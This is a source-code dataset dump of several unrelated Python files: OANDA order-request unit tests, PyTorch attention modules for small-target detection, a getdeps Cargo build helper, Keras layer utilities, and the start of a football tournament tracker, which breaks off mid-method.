(req.TakeProfitDetails,
{"price": 1.10,
"timeInForce": OD.TimeInForce.GTD},
{'timeInForce': 'GTD',
'price': '1.10000'},
ValueError
),
# .. raises ValueError because timeInForce must be GTC/GTD/GFD
(req.TakeProfitDetails,
{"price": 1.10,
"timeInForce": OD.TimeInForce.FOK},
{'timeInForce': 'FOK',
'price': '1.10000'},
ValueError
),
# StopLossDetails
(req.StopLossDetails,
{"price": 1.10},
{'timeInForce': 'GTC',
'price': '1.10000'}
),
# .. raises ValueError because GTD required gtdTime
(req.StopLossDetails,
{"price": 1.10,
"timeInForce": OD.TimeInForce.GTD},
{'timeInForce': 'GTD',
'price': '1.10000'},
ValueError
),
# .. raises ValueError because timeInForce must be GTC/GTD/GFD
(req.StopLossDetails,
{"price": 1.10,
"timeInForce": OD.TimeInForce.FOK},
{'timeInForce': 'FOK',
'price': '1.10000'},
ValueError
),
# TrailingStopLossDetails
(req.TrailingStopLossDetails,
{"distance": 25},
{'timeInForce': 'GTC',
'distance': '25.00000'}
),
# .. raises ValueError because GTD required gtdTime
(req.TrailingStopLossDetails,
{"distance": 100,
"timeInForce": OD.TimeInForce.GTD},
{'timeInForce': 'GTD',
'distance': '100.00000'},
ValueError
),
# .. raises ValueError because timeInForce must be GTC/GTD/GFD
(req.TrailingStopLossDetails,
{"distance": 100,
"timeInForce": OD.TimeInForce.FOK},
{'timeInForce': 'FOK',
'distance': '100.00000'},
ValueError
),
# ClientExtensions
(req.ClientExtensions,
{"clientID": "myID"},
{"id": "myID"},
),
(req.ClientExtensions,
{"clientTag": "myTag"},
{"tag": "myTag"},
),
(req.ClientExtensions,
{"clientComment": "myComment"},
{"comment": "myComment"},
),
# .. raises ValueError because no values were set
(req.ClientExtensions,
{},
{},
ValueError
),
])
def test__anonymous_body(self, cls, inpar, refpar, exc=None):
if not exc:
r = cls(**inpar) if inpar else cls()
self.assertTrue(r.data == refpar)
else:
with self.assertRaises(exc):
r = cls(**inpar)
if __name__ == "__main__":
unittest.main()
| 30.193878 | 75 | 0.468233 |
3a951812ae9cbf0b5d1410cb7713acbb37c91294 | 371 | py | Python | ci_screen/automators/job_item.py | garyjohnson/ci_screen_2 | ea6a0ebd686148bb8977bd2d842e33e71fc2c3f0 | [
"MIT"
] | null | null | null | ci_screen/automators/job_item.py | garyjohnson/ci_screen_2 | ea6a0ebd686148bb8977bd2d842e33e71fc2c3f0 | [
"MIT"
] | null | null | null | ci_screen/automators/job_item.py | garyjohnson/ci_screen_2 | ea6a0ebd686148bb8977bd2d842e33e71fc2c3f0 | [
"MIT"
] | 1 | 2018-08-10T15:04:24.000Z | 2018-08-10T15:04:24.000Z | from kvaut.automator.custom_automator import CustomAutomator
class JobItemAutomator(CustomAutomator):
def is_match(self, value=None, **custom_attributes):
if 'status' not in custom_attributes:
return False
project = self._target.project
return value == project.name and custom_attributes['status'] == project.last_build_status
| 30.916667 | 97 | 0.727763 |
3a95ae559435a30a68aba572eee4bea130369136 | 12,225 | py | Python | models/context.py | Hilbert70403/Infrared-Small-Target | 0b7bddc13ed3b2362735ea858af6e7d18d4374cd | [
"MIT"
] | 21 | 2021-11-08T08:06:36.000Z | 2022-03-26T14:22:35.000Z | models/context.py | Hilbert70403/Infrared-Small-Target | 0b7bddc13ed3b2362735ea858af6e7d18d4374cd | [
"MIT"
] | 4 | 2022-01-19T11:37:13.000Z | 2022-02-28T07:45:19.000Z | models/context.py | Hilbert70403/Infrared-Small-Target | 0b7bddc13ed3b2362735ea858af6e7d18d4374cd | [
"MIT"
] | 9 | 2021-11-15T09:24:41.000Z | 2022-03-24T08:11:00.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = ['NonLocalBlock', 'GCA_Channel', 'GCA_Element', 'AGCB_Element', 'AGCB_Patch', 'CPM']
class NonLocalBlock(nn.Module):
def __init__(self, planes, reduce_ratio=8):
super(NonLocalBlock, self).__init__()
inter_planes = planes // reduce_ratio
self.query_conv = nn.Conv2d(planes, inter_planes, kernel_size=1)
self.key_conv = nn.Conv2d(planes, inter_planes, kernel_size=1)
self.value_conv = nn.Conv2d(planes, planes, kernel_size=1)
self.gamma = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=-1)
def forward(self, x):
m_batchsize, C, height, width = x.size()
proj_query = self.query_conv(x)
proj_key = self.key_conv(x)
proj_value = self.value_conv(x)
proj_query = proj_query.contiguous().view(m_batchsize, -1, width * height).permute(0, 2, 1)
proj_key = proj_key.contiguous().view(m_batchsize, -1, width * height)
energy = torch.bmm(proj_query, proj_key)
attention = self.softmax(energy)
proj_value = proj_value.contiguous().view(m_batchsize, -1, width * height)
out = torch.bmm(proj_value, attention.permute(0, 2, 1))
out = out.view(m_batchsize, -1, height, width)
out = self.gamma * out + x
return out
class GCA_Channel(nn.Module):
def __init__(self, planes, scale, reduce_ratio_nl, att_mode='origin'):
super(GCA_Channel, self).__init__()
assert att_mode in ['origin', 'post']
self.att_mode = att_mode
if att_mode == 'origin':
self.pool = nn.AdaptiveMaxPool2d(scale)
self.non_local_att = NonLocalBlock(planes, reduce_ratio=reduce_ratio_nl)
self.sigmoid = nn.Sigmoid()
elif att_mode == 'post':
self.pool = nn.AdaptiveMaxPool2d(scale)
self.non_local_att = NonLocalBlock(planes, reduce_ratio=1)
self.conv_att = nn.Sequential(
nn.Conv2d(planes, planes // 4, kernel_size=1),
nn.BatchNorm2d(planes // 4),
nn.ReLU(True),
nn.Conv2d(planes // 4, planes, kernel_size=1),
nn.BatchNorm2d(planes),
nn.Sigmoid(),
)
else:
raise NotImplementedError
def forward(self, x):
if self.att_mode == 'origin':
gca = self.pool(x)
gca = self.non_local_att(gca)
gca = self.sigmoid(gca)
elif self.att_mode == 'post':
gca = self.pool(x)
gca = self.non_local_att(gca)
gca = self.conv_att(gca)
else:
raise NotImplementedError
return gca
class GCA_Element(nn.Module):
def __init__(self, planes, scale, reduce_ratio_nl, att_mode='origin'):
super(GCA_Element, self).__init__()
assert att_mode in ['origin', 'post']
self.att_mode = att_mode
if att_mode == 'origin':
self.pool = nn.AdaptiveMaxPool2d(scale)
self.non_local_att = NonLocalBlock(planes, reduce_ratio=reduce_ratio_nl)
self.sigmoid = nn.Sigmoid()
elif att_mode == 'post':
self.pool = nn.AdaptiveMaxPool2d(scale)
self.non_local_att = NonLocalBlock(planes, reduce_ratio=1)
self.conv_att = nn.Sequential(
nn.Conv2d(planes, planes // 4, kernel_size=1),
nn.BatchNorm2d(planes // 4),
nn.ReLU(True),
nn.Conv2d(planes // 4, planes, kernel_size=1),
nn.BatchNorm2d(planes),
)
self.sigmoid = nn.Sigmoid()
else:
raise NotImplementedError
def forward(self, x):
batch_size, C, height, width = x.size()
if self.att_mode == 'origin':
gca = self.pool(x)
gca = self.non_local_att(gca)
gca = F.interpolate(gca, [height, width], mode='bilinear', align_corners=True)
gca = self.sigmoid(gca)
elif self.att_mode == 'post':
gca = self.pool(x)
gca = self.non_local_att(gca)
gca = self.conv_att(gca)
gca = F.interpolate(gca, [height, width], mode='bilinear', align_corners=True)
gca = self.sigmoid(gca)
else:
raise NotImplementedError
return gca
class AGCB_Patch(nn.Module):
def __init__(self, planes, scale=2, reduce_ratio_nl=32, att_mode='origin'):
super(AGCB_Patch, self).__init__()
self.scale = scale
self.non_local = NonLocalBlock(planes, reduce_ratio=reduce_ratio_nl)
self.conv = nn.Sequential(
nn.Conv2d(planes, planes, 3, 1, 1),
nn.BatchNorm2d(planes),
# nn.Dropout(0.1)
)
self.relu = nn.ReLU(True)
self.attention = GCA_Channel(planes, scale, reduce_ratio_nl, att_mode=att_mode)
self.gamma = nn.Parameter(torch.zeros(1))
def forward(self, x):
## long context
gca = self.attention(x)
## single scale non local
batch_size, C, height, width = x.size()
local_x, local_y, attention_ind = [], [], []
step_h, step_w = height // self.scale, width // self.scale
for i in range(self.scale):
for j in range(self.scale):
start_x, start_y = i * step_h, j * step_w
end_x, end_y = min(start_x + step_h, height), min(start_y + step_w, width)
if i == (self.scale - 1):
end_x = height
if j == (self.scale - 1):
end_y = width
local_x += [start_x, end_x]
local_y += [start_y, end_y]
attention_ind += [i, j]
index_cnt = 2 * self.scale * self.scale
assert len(local_x) == index_cnt
context_list = []
for i in range(0, index_cnt, 2):
block = x[:, :, local_x[i]:local_x[i+1], local_y[i]:local_y[i+1]]
attention = gca[:, :, attention_ind[i], attention_ind[i+1]].view(batch_size, C, 1, 1)
context_list.append(self.non_local(block) * attention)
tmp = []
for i in range(self.scale):
row_tmp = []
for j in range(self.scale):
row_tmp.append(context_list[j + i * self.scale])
tmp.append(torch.cat(row_tmp, 3))
context = torch.cat(tmp, 2)
context = self.conv(context)
context = self.gamma * context + x
context = self.relu(context)
return context
class AGCB_Element(nn.Module):
def __init__(self, planes, scale=2, reduce_ratio_nl=32, att_mode='origin'):
super(AGCB_Element, self).__init__()
self.scale = scale
self.non_local = NonLocalBlock(planes, reduce_ratio=reduce_ratio_nl)
self.conv = nn.Sequential(
nn.Conv2d(planes, planes, 3, 1, 1),
nn.BatchNorm2d(planes),
# nn.Dropout(0.1)
)
self.relu = nn.ReLU(True)
self.attention = GCA_Element(planes, scale, reduce_ratio_nl, att_mode=att_mode)
self.gamma = nn.Parameter(torch.zeros(1))
def forward(self, x):
## long context
gca = self.attention(x)
## single scale non local
batch_size, C, height, width = x.size()
local_x, local_y, attention_ind = [], [], []
step_h, step_w = height // self.scale, width // self.scale
for i in range(self.scale):
for j in range(self.scale):
start_x, start_y = i * step_h, j * step_w
end_x, end_y = min(start_x + step_h, height), min(start_y + step_w, width)
if i == (self.scale - 1):
end_x = height
if j == (self.scale - 1):
end_y = width
local_x += [start_x, end_x]
local_y += [start_y, end_y]
attention_ind += [i, j]
index_cnt = 2 * self.scale * self.scale
assert len(local_x) == index_cnt
context_list = []
for i in range(0, index_cnt, 2):
block = x[:, :, local_x[i]:local_x[i+1], local_y[i]:local_y[i+1]]
# attention = gca[:, :, attention_ind[i], attention_ind[i+1]].view(batch_size, C, 1, 1)
context_list.append(self.non_local(block))
tmp = []
for i in range(self.scale):
row_tmp = []
for j in range(self.scale):
row_tmp.append(context_list[j + i * self.scale])
tmp.append(torch.cat(row_tmp, 3))
context = torch.cat(tmp, 2)
context = context * gca
context = self.conv(context)
context = self.gamma * context + x
context = self.relu(context)
return context
class AGCB_NoGCA(nn.Module):
def __init__(self, planes, scale=2, reduce_ratio_nl=32):
super(AGCB_NoGCA, self).__init__()
self.scale = scale
self.non_local = NonLocalBlock(planes, reduce_ratio=reduce_ratio_nl)
self.conv = nn.Sequential(
nn.Conv2d(planes, planes, 3, 1, 1),
nn.BatchNorm2d(planes),
# nn.Dropout(0.1)
)
self.relu = nn.ReLU(True)
self.gamma = nn.Parameter(torch.zeros(1))
def forward(self, x):
## single scale non local
batch_size, C, height, width = x.size()
local_x, local_y, attention_ind = [], [], []
step_h, step_w = height // self.scale, width // self.scale
for i in range(self.scale):
for j in range(self.scale):
start_x, start_y = i * step_h, j * step_w
end_x, end_y = min(start_x + step_h, height), min(start_y + step_w, width)
if i == (self.scale - 1):
end_x = height
if j == (self.scale - 1):
end_y = width
local_x += [start_x, end_x]
local_y += [start_y, end_y]
attention_ind += [i, j]
index_cnt = 2 * self.scale * self.scale
assert len(local_x) == index_cnt
context_list = []
for i in range(0, index_cnt, 2):
block = x[:, :, local_x[i]:local_x[i+1], local_y[i]:local_y[i+1]]
context_list.append(self.non_local(block))
tmp = []
for i in range(self.scale):
row_tmp = []
for j in range(self.scale):
row_tmp.append(context_list[j + i * self.scale])
tmp.append(torch.cat(row_tmp, 3))
context = torch.cat(tmp, 2)
context = self.conv(context)
context = self.gamma * context + x
context = self.relu(context)
return context
class CPM(nn.Module):
def __init__(self, planes, block_type, scales=(3,5,6,10), reduce_ratios=(4,8), att_mode='origin'):
super(CPM, self).__init__()
assert block_type in ['patch', 'element']
assert att_mode in ['origin', 'post']
inter_planes = planes // reduce_ratios[0]
self.conv1 = nn.Sequential(
nn.Conv2d(planes, inter_planes, kernel_size=1),
nn.BatchNorm2d(inter_planes),
nn.ReLU(True),
)
if block_type == 'patch':
self.scale_list = nn.ModuleList(
[AGCB_Patch(inter_planes, scale=scale, reduce_ratio_nl=reduce_ratios[1], att_mode=att_mode)
for scale in scales])
elif block_type == 'element':
self.scale_list = nn.ModuleList(
[AGCB_Element(inter_planes, scale=scale, reduce_ratio_nl=reduce_ratios[1], att_mode=att_mode)
for scale in scales])
else:
raise NotImplementedError
channels = inter_planes * (len(scales) + 1)
self.conv2 = nn.Sequential(
nn.Conv2d(channels, planes, 1),
nn.BatchNorm2d(planes),
nn.ReLU(True),
)
def forward(self, x):
reduced = self.conv1(x)
blocks = []
for i in range(len(self.scale_list)):
blocks.append(self.scale_list[i](reduced))
out = torch.cat(blocks, 1)
out = torch.cat((reduced, out), 1)
out = self.conv2(out)
return out | 35.641399 | 109 | 0.558937 |
3a96f177bdadd6a1d79e415e623de1950e19535a | 17,315 | py | Python | build/fbcode_builder/getdeps/cargo.py | dmitryvinn/watchman | 668d3536031acd9b65950c29d6e956bb42b972bb | [
"MIT"
] | null | null | null | build/fbcode_builder/getdeps/cargo.py | dmitryvinn/watchman | 668d3536031acd9b65950c29d6e956bb42b972bb | [
"MIT"
] | null | null | null | build/fbcode_builder/getdeps/cargo.py | dmitryvinn/watchman | 668d3536031acd9b65950c29d6e956bb42b972bb | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import re
import shutil
from .builder import BuilderBase
class CargoBuilder(BuilderBase):
def __init__(
self,
build_opts,
ctx,
manifest,
src_dir,
build_dir,
inst_dir,
build_doc,
workspace_dir,
manifests_to_build,
loader,
cargo_config_file,
) -> None:
super(CargoBuilder, self).__init__(
build_opts, ctx, manifest, src_dir, build_dir, inst_dir
)
self.build_doc = build_doc
self.ws_dir = workspace_dir
self.manifests_to_build = manifests_to_build and manifests_to_build.split(",")
self.loader = loader
self.cargo_config_file_subdir = cargo_config_file
def run_cargo(self, install_dirs, operation, args=None) -> None:
args = args or []
env = self._compute_env(install_dirs)
# Enable using nightly features with stable compiler
env["RUSTC_BOOTSTRAP"] = "1"
env["LIBZ_SYS_STATIC"] = "1"
cmd = [
"cargo",
operation,
"--workspace",
"-j%s" % self.num_jobs,
] + args
self._run_cmd(cmd, cwd=self.workspace_dir(), env=env)
def build_source_dir(self):
return os.path.join(self.build_dir, "source")
def workspace_dir(self):
return os.path.join(self.build_source_dir(), self.ws_dir or "")
def manifest_dir(self, manifest):
return os.path.join(self.build_source_dir(), manifest)
def recreate_dir(self, src, dst) -> None:
if os.path.isdir(dst):
shutil.rmtree(dst)
shutil.copytree(src, dst)
def cargo_config_file(self):
build_source_dir = self.build_dir
if self.cargo_config_file_subdir:
return os.path.join(build_source_dir, self.cargo_config_file_subdir)
else:
return os.path.join(build_source_dir, ".cargo", "config")
def _create_cargo_config(self):
cargo_config_file = self.cargo_config_file()
cargo_config_dir = os.path.dirname(cargo_config_file)
if not os.path.isdir(cargo_config_dir):
os.mkdir(cargo_config_dir)
print(f"Writing cargo config for {self.manifest.name} to {cargo_config_file}")
with open(cargo_config_file, "w+") as f:
f.write(
"""\
# Generated by getdeps.py
[build]
target-dir = '''{}'''
[net]
git-fetch-with-cli = true
[profile.dev]
debug = false
incremental = false
""".format(
self.build_dir.replace("\\", "\\\\")
)
)
# Point to vendored sources from getdeps manifests
dep_to_git = self._resolve_dep_to_git()
for _dep, git_conf in dep_to_git.items():
if "cargo_vendored_sources" in git_conf:
with open(cargo_config_file, "a") as f:
vendored_dir = git_conf["cargo_vendored_sources"].replace(
"\\", "\\\\"
)
f.write(
f"""
[source."{git_conf["repo_url"]}"]
directory = "{vendored_dir}"
"""
)
# Point to vendored crates.io if possible
try:
from .facebook.rust import vendored_crates
vendored_crates(self.build_opts, cargo_config_file)
except ImportError:
# This FB internal module isn't shippped to github,
# so just rely on cargo downloading crates on it's own
pass
return dep_to_git
def _prepare(self, install_dirs, reconfigure):
build_source_dir = self.build_source_dir()
self.recreate_dir(self.src_dir, build_source_dir)
dep_to_git = self._create_cargo_config()
if self.ws_dir is not None:
self._patchup_workspace(dep_to_git)
def _build(self, install_dirs, reconfigure) -> None:
# _prepare has been run already. Actually do the build
build_source_dir = self.build_source_dir()
if self.manifests_to_build is None:
self.run_cargo(
install_dirs,
"build",
["--out-dir", os.path.join(self.inst_dir, "bin"), "-Zunstable-options"],
)
else:
for manifest in self.manifests_to_build:
self.run_cargo(
install_dirs,
"build",
[
"--out-dir",
os.path.join(self.inst_dir, "bin"),
"-Zunstable-options",
"--manifest-path",
self.manifest_dir(manifest),
],
)
self.recreate_dir(build_source_dir, os.path.join(self.inst_dir, "source"))
def run_tests(
self, install_dirs, schedule_type, owner, test_filter, retry, no_testpilot
) -> None:
if test_filter:
args = ["--", test_filter]
else:
args = []
if self.manifests_to_build is None:
self.run_cargo(install_dirs, "test", args)
if self.build_doc:
self.run_cargo(install_dirs, "doc", ["--no-deps"])
else:
for manifest in self.manifests_to_build:
margs = ["--manifest-path", self.manifest_dir(manifest)]
self.run_cargo(install_dirs, "test", args + margs)
if self.build_doc:
self.run_cargo(install_dirs, "doc", ["--no-deps"] + margs)
def _patchup_workspace(self, dep_to_git) -> None:
"""
This method makes some assumptions about the state of the project and
its cargo dependendies:
1. Crates from cargo dependencies can be extracted from Cargo.toml files
using _extract_crates function. It is using a heuristic so check its
code to understand how it is done.
2. The extracted cargo dependencies crates can be found in the
dependency's install dir using _resolve_crate_to_path function
which again is using a heuristic.
Notice that many things might go wrong here. E.g. if someone depends
on another getdeps crate by writing in their Cargo.toml file:
my-rename-of-crate = { package = "crate", git = "..." }
they can count themselves lucky because the code will raise an
Exception. There migh be more cases where the code will silently pass
producing bad results.
"""
workspace_dir = self.workspace_dir()
config = self._resolve_config(dep_to_git)
if config:
patch_cargo = os.path.join(workspace_dir, "Cargo.toml")
print(f"writing patch to {patch_cargo}")
with open(patch_cargo, "r+") as f:
manifest_content = f.read()
if "[package]" not in manifest_content:
# A fake manifest has to be crated to change the virtual
# manifest into a non-virtual. The virtual manifests are limited
# in many ways and the inability to define patches on them is
# one. Check https://github.com/rust-lang/cargo/issues/4934 to
# see if it is resolved.
null_file = "/dev/null"
if self.build_opts.is_windows():
null_file = "nul"
f.write(
f"""
[package]
name = "fake_manifest_of_{self.manifest.name}"
version = "0.0.0"
[lib]
path = "{null_file}"
"""
)
else:
f.write("\n")
f.write(config)
def _resolve_config(self, dep_to_git) -> str:
"""
Returns a configuration to be put inside root Cargo.toml file which
patches the dependencies git code with local getdeps versions.
See https://doc.rust-lang.org/cargo/reference/manifest.html#the-patch-section
"""
dep_to_crates = self._resolve_dep_to_crates(self.build_source_dir(), dep_to_git)
config = []
git_url_to_crates_and_paths = {}
for dep_name in sorted(dep_to_git.keys()):
git_conf = dep_to_git[dep_name]
req_crates = sorted(dep_to_crates.get(dep_name, []))
if not req_crates:
continue # nothing to patch, move along
git_url = git_conf.get("repo_url", None)
crate_source_map = git_conf["crate_source_map"]
if git_url and crate_source_map:
crates_to_patch_path = git_url_to_crates_and_paths.get(git_url, {})
for c in req_crates:
if c in crate_source_map and c not in crates_to_patch_path:
crates_to_patch_path[c] = crate_source_map[c]
print(
f"{self.manifest.name}: Patching crate {c} via virtual manifest in {self.workspace_dir()}"
)
if crates_to_patch_path:
git_url_to_crates_and_paths[git_url] = crates_to_patch_path
for git_url, crates_to_patch_path in git_url_to_crates_and_paths.items():
crates_patches = [
'{} = {{ path = "{}" }}'.format(
crate,
crates_to_patch_path[crate].replace("\\", "\\\\"),
)
for crate in sorted(crates_to_patch_path.keys())
]
config.append(f'\n[patch."{git_url}"]\n' + "\n".join(crates_patches))
return "\n".join(config)
def _resolve_dep_to_git(self):
"""
For each direct dependency of the currently build manifest check if it
is also cargo-builded and if yes then extract it's git configs and
install dir
"""
dependencies = self.manifest.get_dependencies(self.ctx)
if not dependencies:
return []
dep_to_git = {}
for dep in dependencies:
dep_manifest = self.loader.load_manifest(dep)
dep_builder = dep_manifest.get("build", "builder", ctx=self.ctx)
dep_cargo_conf = dep_manifest.get_section_as_dict("cargo", self.ctx)
dep_crate_map = dep_manifest.get_section_as_dict("crate.pathmap", self.ctx)
if (
not (dep_crate_map or dep_cargo_conf)
and dep_builder not in ["cargo"]
or dep == "rust"
):
# This dependency has no cargo rust content so ignore it.
# The "rust" dependency is an exception since it contains the
# toolchain.
continue
git_conf = dep_manifest.get_section_as_dict("git", self.ctx)
if dep != "rust" and "repo_url" not in git_conf:
raise Exception(
f"{dep}: A cargo dependency requires git.repo_url to be defined."
)
if dep_builder == "cargo":
dep_source_dir = self.loader.get_project_install_dir(dep_manifest)
dep_source_dir = os.path.join(dep_source_dir, "source")
else:
fetcher = self.loader.create_fetcher(dep_manifest)
dep_source_dir = fetcher.get_src_dir()
crate_source_map = {}
if dep_crate_map:
for (crate, subpath) in dep_crate_map.items():
if crate not in crate_source_map:
if self.build_opts.is_windows():
subpath = subpath.replace("/", "\\")
crate_path = os.path.join(dep_source_dir, subpath)
print(
f"{self.manifest.name}: Mapped crate {crate} to dep {dep} dir {crate_path}"
)
crate_source_map[crate] = crate_path
elif dep_cargo_conf:
# We don't know what crates are defined buy the dep, look for them
search_pattern = re.compile('\\[package\\]\nname = "(.*)"')
for crate_root, _, files in os.walk(dep_source_dir):
if "Cargo.toml" in files:
with open(os.path.join(crate_root, "Cargo.toml"), "r") as f:
content = f.read()
match = search_pattern.search(content)
if match:
crate = match.group(1)
if crate:
print(
f"{self.manifest.name}: Discovered crate {crate} in dep {dep} dir {crate_root}"
)
crate_source_map[crate] = crate_root
git_conf["crate_source_map"] = crate_source_map
if not dep_crate_map and dep_cargo_conf:
dep_cargo_dir = self.loader.get_project_build_dir(dep_manifest)
dep_cargo_dir = os.path.join(dep_cargo_dir, "source")
dep_ws_dir = dep_cargo_conf.get("workspace_dir", None)
if dep_ws_dir:
dep_cargo_dir = os.path.join(dep_cargo_dir, dep_ws_dir)
git_conf["cargo_vendored_sources"] = dep_cargo_dir
dep_to_git[dep] = git_conf
return dep_to_git
def _resolve_dep_to_crates(self, build_source_dir, dep_to_git):
"""
This function traverse the build_source_dir in search of Cargo.toml
files, extracts the crate names from them using _extract_crates
function and returns a merged result containing crate names per
dependency name from all Cargo.toml files in the project.
"""
if not dep_to_git:
return {} # no deps, so don't waste time traversing files
dep_to_crates = {}
# First populate explicit crate paths from depedencies
for name, git_conf in dep_to_git.items():
crates = git_conf["crate_source_map"].keys()
if crates:
dep_to_crates.setdefault(name, set()).update(crates)
# Now find from Cargo.tomls
for root, _, files in os.walk(build_source_dir):
for f in files:
if f == "Cargo.toml":
more_dep_to_crates = CargoBuilder._extract_crates_used(
os.path.join(root, f), dep_to_git
)
for dep_name, crates in more_dep_to_crates.items():
existing_crates = dep_to_crates.get(dep_name, set())
for c in crates:
if c not in existing_crates:
print(
f"Patch {self.manifest.name} uses {dep_name} crate {crates}"
)
existing_crates.insert(c)
dep_to_crates.setdefault(name, set()).update(existing_crates)
return dep_to_crates
@staticmethod
def _extract_crates_used(cargo_toml_file, dep_to_git):
"""
This functions reads content of provided cargo toml file and extracts
crate names per each dependency. The extraction is done by a heuristic
so it might be incorrect.
"""
deps_to_crates = {}
with open(cargo_toml_file, "r") as f:
for line in f.readlines():
if line.startswith("#") or "git = " not in line:
continue # filter out commented lines and ones without git deps
for dep_name, conf in dep_to_git.items():
# Only redirect deps that point to git URLS
if 'git = "{}"'.format(conf["repo_url"]) in line:
pkg_template = ' package = "'
if pkg_template in line:
crate_name, _, _ = line.partition(pkg_template)[
2
].partition('"')
else:
crate_name, _, _ = line.partition("=")
deps_to_crates.setdefault(dep_name, set()).add(
crate_name.strip()
)
return deps_to_crates
def _resolve_crate_to_path(self, crate, crate_source_map):
"""
Tries to find <crate> in source_dir by searching a [package]
keyword followed by name = "<crate>".
"""
search_pattern = '[package]\nname = "{}"'.format(crate)
for (_crate, crate_source_dir) in crate_source_map.items():
for crate_root, _, files in os.walk(crate_source_dir):
if "Cargo.toml" in files:
with open(os.path.join(crate_root, "Cargo.toml"), "r") as f:
content = f.read()
if search_pattern in content:
return crate_root
raise Exception(
f"{self.manifest.name}: Failed to find dep crate {crate} in paths {crate_source_map}"
)
| 40.081019 | 119 | 0.551372 |
3a97bee3b980525a2f4756251f4575984854cc03 | 500 | py | Python | setup.py | EricCWWong/GSimulator | aee7dc81d2a709beb94c02ffc8a288cd7ba06747 | [
"MIT"
] | null | null | null | setup.py | EricCWWong/GSimulator | aee7dc81d2a709beb94c02ffc8a288cd7ba06747 | [
"MIT"
] | 7 | 2020-02-01T02:19:49.000Z | 2020-07-10T12:49:28.000Z | setup.py | EricCWWong/GSimulator | aee7dc81d2a709beb94c02ffc8a288cd7ba06747 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
setup(
name="GSimulator",
packages=find_packages(exclude=['*test']),
version="0.1.1",
author="Eric Wong",
description='This package allows user to \
simulate conductance of quantum wires',
author_email='c.wing.wong.19@ucl.ac.uk',
install_requires=['numpy', 'matplotlib', 'prettytable', 'qutip', 'tqdm'],
entry_points={
'console_scripts': [
'gsimulator = GSimulator.command:process'
]}
)
| 29.411765 | 77 | 0.644 |
3a98425fabf2f4efae0310710f9d76f3fbba768a | 3,995 | py | Python | donn/layers.py | sharan-amutharasu/DONN | c14557e8ef57f3e1c1b73c1fa98cb6ba19a82904 | [
"MIT"
] | 3 | 2018-08-17T05:31:25.000Z | 2020-02-13T19:43:02.000Z | tests/donn/layers.py | sharan-amutharasu/DONN | c14557e8ef57f3e1c1b73c1fa98cb6ba19a82904 | [
"MIT"
] | 1 | 2018-11-19T06:16:50.000Z | 2018-11-19T06:17:53.000Z | tests/donn/layers.py | sharan-amutharasu/DONN | c14557e8ef57f3e1c1b73c1fa98cb6ba19a82904 | [
"MIT"
] | 2 | 2018-12-06T05:01:07.000Z | 2018-12-06T11:59:47.000Z |
# coding: utf-8
# In[4]:
from keras.layers import Activation, Dense, Dropout
from keras.layers.advanced_activations import LeakyReLU, PReLU, ThresholdedReLU, ELU
from keras import regularizers
# In[5]:
def get_activation_layer(activation):
"""
Returns the activation layer given its name
"""
if activation == 'ELU':
return ELU()
if activation == 'LeakyReLU':
return LeakyReLU()
if activation == 'ThresholdedReLU':
return ThresholdedReLU()
if activation == 'PReLU':
return PReLU()
return Activation(activation)
# In[4]:
class Layer(object):
"""
Layer object for adding different types of layers to the model
"""
def __init__(self, layer_type):
self.layer_type = layer_type
if self.layer_type in ["hidden", "input", "output"]:
self.kernel_initializer='normal'
self.kernel_regularizer=regularizers.l2(0.01)
def add_to_model(self, model, params, count, input_dim=None, output_layer_units=None, mode=None, layers=None):
"""
Add layer to model
"""
## Input Layer
if self.layer_type == "input":
units = params[str(self.layer_type + "_layer_" + str(count) + "_units")]
if input_dim is not None:
model.add(Dense(units, input_dim=input_dim, kernel_initializer=self.kernel_initializer, kernel_regularizer=self.kernel_regularizer))
else:
model.add(Dense(units, kernel_initializer=self.kernel_initializer, kernel_regularizer=self.kernel_regularizer))
return model
## Hidden Layer
if self.layer_type == "hidden":
units = params[str(self.layer_type + "_layer_" + str(count) + "_units")]
if input_dim is not None:
model.add(Dense(units, input_dim=input_dim, kernel_initializer=self.kernel_initializer, kernel_regularizer=self.kernel_regularizer))
else:
model.add(Dense(units, kernel_initializer=self.kernel_initializer, kernel_regularizer=self.kernel_regularizer))
return model
## Activation Layer
if self.layer_type == "activation":
model.add(get_activation_layer(params["activation_function"]))
return model
## Dropout Layer
if self.layer_type == "dropout":
dropout_rate = params["dropout_rate"]
if dropout_rate > 0:
model.add(Dropout(dropout_rate))
return model
## Output Layer
if self.layer_type == "output":
if mode == "classifier":
model.add(Dense(output_layer_units, kernel_initializer=self.kernel_initializer))
try:
if params["output_activation_function"] != None:
model.add(get_activation_layer(params["output_activation_function"]))
except KeyError:
pass
elif mode == "regressor":
model.add(Dense(output_layer_units, kernel_initializer=self.kernel_initializer))
else:
raise ValueError("mode has to be 'regressor' or 'classifier'")
return model
## LSTM Layer
# if self.layer_type == "LSTM":
# units = params[str(self.layer_type + "_layer_" + str(count) + "_units")]
# count_LSTM = layers.count("LSTM")
# if count < count_LSTM:
# return_sequences = True
# else:
# return_sequences = False
# if input_dim is not None:
# model.add(LSTM(units, input_dim=input_dim, recurrent_activation=params["LSTM_recurrent_activation_function"], return_sequences=return_sequences))
# else:
# model.add(LSTM(units, recurrent_activation=params["LSTM_recurrent_activation_function"], return_sequences=return_sequences))
# return model
| 37.336449 | 163 | 0.606758 |
3a9b8204ffb1f187d8be96695d1cf97c47ce3c0a | 3,618 | py | Python | tournament.py | karol-prz/predictor | 2774fe2a88a9bf5f7aa58f884cdcf879182c64c7 | [
"MIT"
] | null | null | null | tournament.py | karol-prz/predictor | 2774fe2a88a9bf5f7aa58f884cdcf879182c64c7 | [
"MIT"
] | null | null | null | tournament.py | karol-prz/predictor | 2774fe2a88a9bf5f7aa58f884cdcf879182c64c7 | [
"MIT"
] | null | null | null |
class Tournament:
def __init__(self):
# Dictionary of games played, scored, conceded, gd, points
self.tables = {'A': {}, 'B': {}, 'C': {}, 'D': {}, 'E': {}, 'F': {}, 'G': {}, 'H':{}}
self.groups_finished = False
self.records = {}
self.references = {}
from parsers.utils import read_json
self.r = read_json('/home/karol/python/predictor/data/matches')
def update_match(self, group, home_team, away_team, home_score, away_score, game, result, date):
self.r.append({
"away_score": away_score,
"away_team": away_team,
"date": date,
"home_score": home_score,
"home_team": home_team
})
if not self.groups_finished:
